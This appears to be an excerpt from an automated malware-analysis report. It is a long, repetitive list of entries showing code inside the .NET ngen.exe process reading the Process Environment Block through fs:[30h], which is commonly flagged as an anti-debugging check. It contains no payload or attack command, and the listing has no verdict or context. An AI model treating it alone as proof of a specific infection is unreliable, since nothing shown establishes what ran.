Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058B8402 mov eax, dword ptr fs:[00000030h] 4_2_058B8402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587C427 mov eax, dword ptr fs:[00000030h] 4_2_0587C427
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587E420 mov eax, dword ptr fs:[00000030h] 4_2_0587E420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058BA430 mov eax, dword ptr fs:[00000030h] 4_2_058BA430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0593F453 mov eax, dword ptr fs:[00000030h] 4_2_0593F453
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0588B440 mov eax, dword ptr fs:[00000030h] 4_2_0588B440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058BE443 mov eax, dword ptr fs:[00000030h] 4_2_058BE443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058A245A mov eax, dword ptr fs:[00000030h] 4_2_058A245A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587645D mov eax, dword ptr fs:[00000030h] 4_2_0587645D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05881460 mov eax, dword ptr fs:[00000030h] 4_2_05881460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0589F460 mov eax, dword ptr fs:[00000030h] 4_2_0589F460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0595547F mov eax, dword ptr fs:[00000030h] 4_2_0595547F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058AA470 mov eax, dword ptr fs:[00000030h] 4_2_058AA470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0593F78A mov eax, dword ptr fs:[00000030h] 4_2_0593F78A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_059537B6 mov eax, dword ptr fs:[00000030h] 4_2_059537B6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058807AF mov eax, dword ptr fs:[00000030h] 4_2_058807AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_059097A9 mov eax, dword ptr fs:[00000030h] 4_2_059097A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058AD7B0 mov eax, dword ptr fs:[00000030h] 4_2_058AD7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587F7BA mov eax, dword ptr fs:[00000030h] 4_2_0587F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0590F7AF mov eax, dword ptr fs:[00000030h] 4_2_0590F7AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0588C7C0 mov eax, dword ptr fs:[00000030h] 4_2_0588C7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058857C0 mov eax, dword ptr fs:[00000030h] 4_2_058857C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_059007C3 mov eax, dword ptr fs:[00000030h] 4_2_059007C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058A27ED mov eax, dword ptr fs:[00000030h] 4_2_058A27ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0588D7E0 mov ecx, dword ptr fs:[00000030h] 4_2_0588D7E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058847FB mov eax, dword ptr fs:[00000030h] 4_2_058847FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05885702 mov eax, dword ptr fs:[00000030h] 4_2_05885702
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05887703 mov eax, dword ptr fs:[00000030h] 4_2_05887703
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058BC700 mov eax, dword ptr fs:[00000030h] 4_2_058BC700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058BF71F mov eax, dword ptr fs:[00000030h] 4_2_058BF71F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05880710 mov eax, dword ptr fs:[00000030h] 4_2_05880710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058B0710 mov eax, dword ptr fs:[00000030h] 4_2_058B0710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05883720 mov eax, dword ptr fs:[00000030h] 4_2_05883720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0595B73C mov eax, dword ptr fs:[00000030h] 4_2_0595B73C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0589F720 mov eax, dword ptr fs:[00000030h] 4_2_0589F720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058BC720 mov eax, dword ptr fs:[00000030h] 4_2_058BC720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0588973A mov eax, dword ptr fs:[00000030h] 4_2_0588973A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058B273C mov eax, dword ptr fs:[00000030h] 4_2_058B273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058B273C mov ecx, dword ptr fs:[00000030h] 4_2_058B273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05879730 mov eax, dword ptr fs:[00000030h] 4_2_05879730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0593F72E mov eax, dword ptr fs:[00000030h] 4_2_0593F72E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058FC730 mov eax, dword ptr fs:[00000030h] 4_2_058FC730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0594972B mov eax, dword ptr fs:[00000030h] 4_2_0594972B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058B5734 mov eax, dword ptr fs:[00000030h] 4_2_058B5734
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05904755 mov eax, dword ptr fs:[00000030h] 4_2_05904755
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058B674D mov esi, dword ptr fs:[00000030h] 4_2_058B674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058B674D mov eax, dword ptr fs:[00000030h] 4_2_058B674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05893740 mov eax, dword ptr fs:[00000030h] 4_2_05893740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05880750 mov eax, dword ptr fs:[00000030h] 4_2_05880750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C2750 mov eax, dword ptr fs:[00000030h] 4_2_058C2750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05953749 mov eax, dword ptr fs:[00000030h] 4_2_05953749
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587B765 mov eax, dword ptr fs:[00000030h] 4_2_0587B765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05888770 mov eax, dword ptr fs:[00000030h] 4_2_05888770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05890770 mov eax, dword ptr fs:[00000030h] 4_2_05890770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05884690 mov eax, dword ptr fs:[00000030h] 4_2_05884690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05884690 mov eax, dword ptr fs:[00000030h] 4_2_05884690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0590368C mov eax, dword ptr fs:[00000030h] 4_2_0590368C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0590368C mov eax, dword ptr fs:[00000030h] 4_2_0590368C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0590368C mov eax, dword ptr fs:[00000030h] 4_2_0590368C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0590368C mov eax, dword ptr fs:[00000030h] 4_2_0590368C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587D6AA mov eax, dword ptr fs:[00000030h] 4_2_0587D6AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587D6AA mov eax, dword ptr fs:[00000030h] 4_2_0587D6AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058BC6A6 mov eax, dword ptr fs:[00000030h] 4_2_058BC6A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058776B2 mov eax, dword ptr fs:[00000030h] 4_2_058776B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058776B2 mov eax, dword ptr fs:[00000030h] 4_2_058776B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058776B2 mov eax, dword ptr fs:[00000030h] 4_2_058776B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058B66B0 mov eax, dword ptr fs:[00000030h] 4_2_058B66B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058B16CF mov eax, dword ptr fs:[00000030h] 4_2_058B16CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0588B6C0 mov eax, dword ptr fs:[00000030h] 4_2_0588B6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0588B6C0 mov eax, dword ptr fs:[00000030h] 4_2_0588B6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0588B6C0 mov eax, dword ptr fs:[00000030h] 4_2_0588B6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0588B6C0 mov eax, dword ptr fs:[00000030h] 4_2_0588B6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0588B6C0 mov eax, dword ptr fs:[00000030h] 4_2_0588B6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0588B6C0 mov eax, dword ptr fs:[00000030h] 4_2_0588B6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058BA6C7 mov ebx, dword ptr fs:[00000030h] 4_2_058BA6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058BA6C7 mov eax, dword ptr fs:[00000030h] 4_2_058BA6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0593F6C7 mov eax, dword ptr fs:[00000030h] 4_2_0593F6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_059416CC mov eax, dword ptr fs:[00000030h] 4_2_059416CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_059416CC mov eax, dword ptr fs:[00000030h] 4_2_059416CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_059416CC mov eax, dword ptr fs:[00000030h] 4_2_059416CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_059416CC mov eax, dword ptr fs:[00000030h] 4_2_059416CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_059006F1 mov eax, dword ptr fs:[00000030h] 4_2_059006F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_059006F1 mov eax, dword ptr fs:[00000030h] 4_2_059006F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0593D6F0 mov eax, dword ptr fs:[00000030h] 4_2_0593D6F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058B36EF mov eax, dword ptr fs:[00000030h] 4_2_058B36EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058AD6E0 mov eax, dword ptr fs:[00000030h] 4_2_058AD6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058AD6E0 mov eax, dword ptr fs:[00000030h] 4_2_058AD6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058FE6F2 mov eax, dword ptr fs:[00000030h] 4_2_058FE6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058FE6F2 mov eax, dword ptr fs:[00000030h] 4_2_058FE6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058FE6F2 mov eax, dword ptr fs:[00000030h] 4_2_058FE6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058FE6F2 mov eax, dword ptr fs:[00000030h] 4_2_058FE6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_059136EE mov eax, dword ptr fs:[00000030h] 4_2_059136EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_059136EE mov eax, dword ptr fs:[00000030h] 4_2_059136EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_059136EE mov eax, dword ptr fs:[00000030h] 4_2_059136EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_059136EE mov eax, dword ptr fs:[00000030h] 4_2_059136EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_059136EE mov eax, dword ptr fs:[00000030h] 4_2_059136EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_059136EE mov eax, dword ptr fs:[00000030h] 4_2_059136EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0589260B mov eax, dword ptr fs:[00000030h] 4_2_0589260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0589260B mov eax, dword ptr fs:[00000030h] 4_2_0589260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0589260B mov eax, dword ptr fs:[00000030h] 4_2_0589260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0589260B mov eax, dword ptr fs:[00000030h] 4_2_0589260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0589260B mov eax, dword ptr fs:[00000030h] 4_2_0589260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0589260B mov eax, dword ptr fs:[00000030h] 4_2_0589260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0589260B mov eax, dword ptr fs:[00000030h] 4_2_0589260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058FE609 mov eax, dword ptr fs:[00000030h] 4_2_058FE609
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058BF603 mov eax, dword ptr fs:[00000030h] 4_2_058BF603
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058B1607 mov eax, dword ptr fs:[00000030h] 4_2_058B1607
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C2619 mov eax, dword ptr fs:[00000030h] 4_2_058C2619
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05883616 mov eax, dword ptr fs:[00000030h] 4_2_05883616
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05883616 mov eax, dword ptr fs:[00000030h] 4_2_05883616
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587F626 mov eax, dword ptr fs:[00000030h] 4_2_0587F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587F626 mov eax, dword ptr fs:[00000030h] 4_2_0587F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587F626 mov eax, dword ptr fs:[00000030h] 4_2_0587F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587F626 mov eax, dword ptr fs:[00000030h] 4_2_0587F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587F626 mov eax, dword ptr fs:[00000030h] 4_2_0587F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587F626 mov eax, dword ptr fs:[00000030h] 4_2_0587F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587F626 mov eax, dword ptr fs:[00000030h] 4_2_0587F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587F626 mov eax, dword ptr fs:[00000030h] 4_2_0587F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587F626 mov eax, dword ptr fs:[00000030h] 4_2_0587F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05955636 mov eax, dword ptr fs:[00000030h] 4_2_05955636
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0588262C mov eax, dword ptr fs:[00000030h] 4_2_0588262C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058B6620 mov eax, dword ptr fs:[00000030h] 4_2_058B6620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058B8620 mov eax, dword ptr fs:[00000030h] 4_2_058B8620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0589E627 mov eax, dword ptr fs:[00000030h] 4_2_0589E627
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0589C640 mov eax, dword ptr fs:[00000030h] 4_2_0589C640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058BA660 mov eax, dword ptr fs:[00000030h] 4_2_058BA660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058BA660 mov eax, dword ptr fs:[00000030h] 4_2_058BA660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058B9660 mov eax, dword ptr fs:[00000030h] 4_2_058B9660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058B9660 mov eax, dword ptr fs:[00000030h] 4_2_058B9660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0594866E mov eax, dword ptr fs:[00000030h] 4_2_0594866E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0594866E mov eax, dword ptr fs:[00000030h] 4_2_0594866E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058B2674 mov eax, dword ptr fs:[00000030h] 4_2_058B2674
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C0185 mov eax, dword ptr fs:[00000030h] 4_2_058C0185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0590019F mov eax, dword ptr fs:[00000030h] 4_2_0590019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0590019F mov eax, dword ptr fs:[00000030h] 4_2_0590019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0590019F mov eax, dword ptr fs:[00000030h] 4_2_0590019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0590019F mov eax, dword ptr fs:[00000030h] 4_2_0590019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587A197 mov eax, dword ptr fs:[00000030h] 4_2_0587A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587A197 mov eax, dword ptr fs:[00000030h] 4_2_0587A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587A197 mov eax, dword ptr fs:[00000030h] 4_2_0587A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0593C188 mov eax, dword ptr fs:[00000030h] 4_2_0593C188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0593C188 mov eax, dword ptr fs:[00000030h] 4_2_0593C188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058D7190 mov eax, dword ptr fs:[00000030h] 4_2_058D7190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_059311A4 mov eax, dword ptr fs:[00000030h] 4_2_059311A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_059311A4 mov eax, dword ptr fs:[00000030h] 4_2_059311A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_059311A4 mov eax, dword ptr fs:[00000030h] 4_2_059311A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_059311A4 mov eax, dword ptr fs:[00000030h] 4_2_059311A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0589B1B0 mov eax, dword ptr fs:[00000030h] 4_2_0589B1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_059461C3 mov eax, dword ptr fs:[00000030h] 4_2_059461C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_059461C3 mov eax, dword ptr fs:[00000030h] 4_2_059461C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058BD1D0 mov eax, dword ptr fs:[00000030h] 4_2_058BD1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058BD1D0 mov ecx, dword ptr fs:[00000030h] 4_2_058BD1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_059551CB mov eax, dword ptr fs:[00000030h] 4_2_059551CB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058FE1D0 mov eax, dword ptr fs:[00000030h] 4_2_058FE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058FE1D0 mov eax, dword ptr fs:[00000030h] 4_2_058FE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058FE1D0 mov ecx, dword ptr fs:[00000030h] 4_2_058FE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058FE1D0 mov eax, dword ptr fs:[00000030h] 4_2_058FE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058FE1D0 mov eax, dword ptr fs:[00000030h] 4_2_058FE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058A51EF mov eax, dword ptr fs:[00000030h] 4_2_058A51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058A51EF mov eax, dword ptr fs:[00000030h] 4_2_058A51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058A51EF mov eax, dword ptr fs:[00000030h] 4_2_058A51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058A51EF mov eax, dword ptr fs:[00000030h] 4_2_058A51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058A51EF mov eax, dword ptr fs:[00000030h] 4_2_058A51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058A51EF mov eax, dword ptr fs:[00000030h] 4_2_058A51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058A51EF mov eax, dword ptr fs:[00000030h] 4_2_058A51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058A51EF mov eax, dword ptr fs:[00000030h] 4_2_058A51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058A51EF mov eax, dword ptr fs:[00000030h] 4_2_058A51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058A51EF mov eax, dword ptr fs:[00000030h] 4_2_058A51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058A51EF mov eax, dword ptr fs:[00000030h] 4_2_058A51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058A51EF mov eax, dword ptr fs:[00000030h] 4_2_058A51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058A51EF mov eax, dword ptr fs:[00000030h] 4_2_058A51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058851ED mov eax, dword ptr fs:[00000030h] 4_2_058851ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_059561E5 mov eax, dword ptr fs:[00000030h] 4_2_059561E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058B01F8 mov eax, dword ptr fs:[00000030h] 4_2_058B01F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05940115 mov eax, dword ptr fs:[00000030h] 4_2_05940115
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0592A118 mov ecx, dword ptr fs:[00000030h] 4_2_0592A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0592A118 mov eax, dword ptr fs:[00000030h] 4_2_0592A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0592A118 mov eax, dword ptr fs:[00000030h] 4_2_0592A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0592A118 mov eax, dword ptr fs:[00000030h] 4_2_0592A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058B0124 mov eax, dword ptr fs:[00000030h] 4_2_058B0124
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587B136 mov eax, dword ptr fs:[00000030h] 4_2_0587B136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587B136 mov eax, dword ptr fs:[00000030h] 4_2_0587B136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587B136 mov eax, dword ptr fs:[00000030h] 4_2_0587B136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587B136 mov eax, dword ptr fs:[00000030h] 4_2_0587B136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05881131 mov eax, dword ptr fs:[00000030h] 4_2_05881131
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05881131 mov eax, dword ptr fs:[00000030h] 4_2_05881131
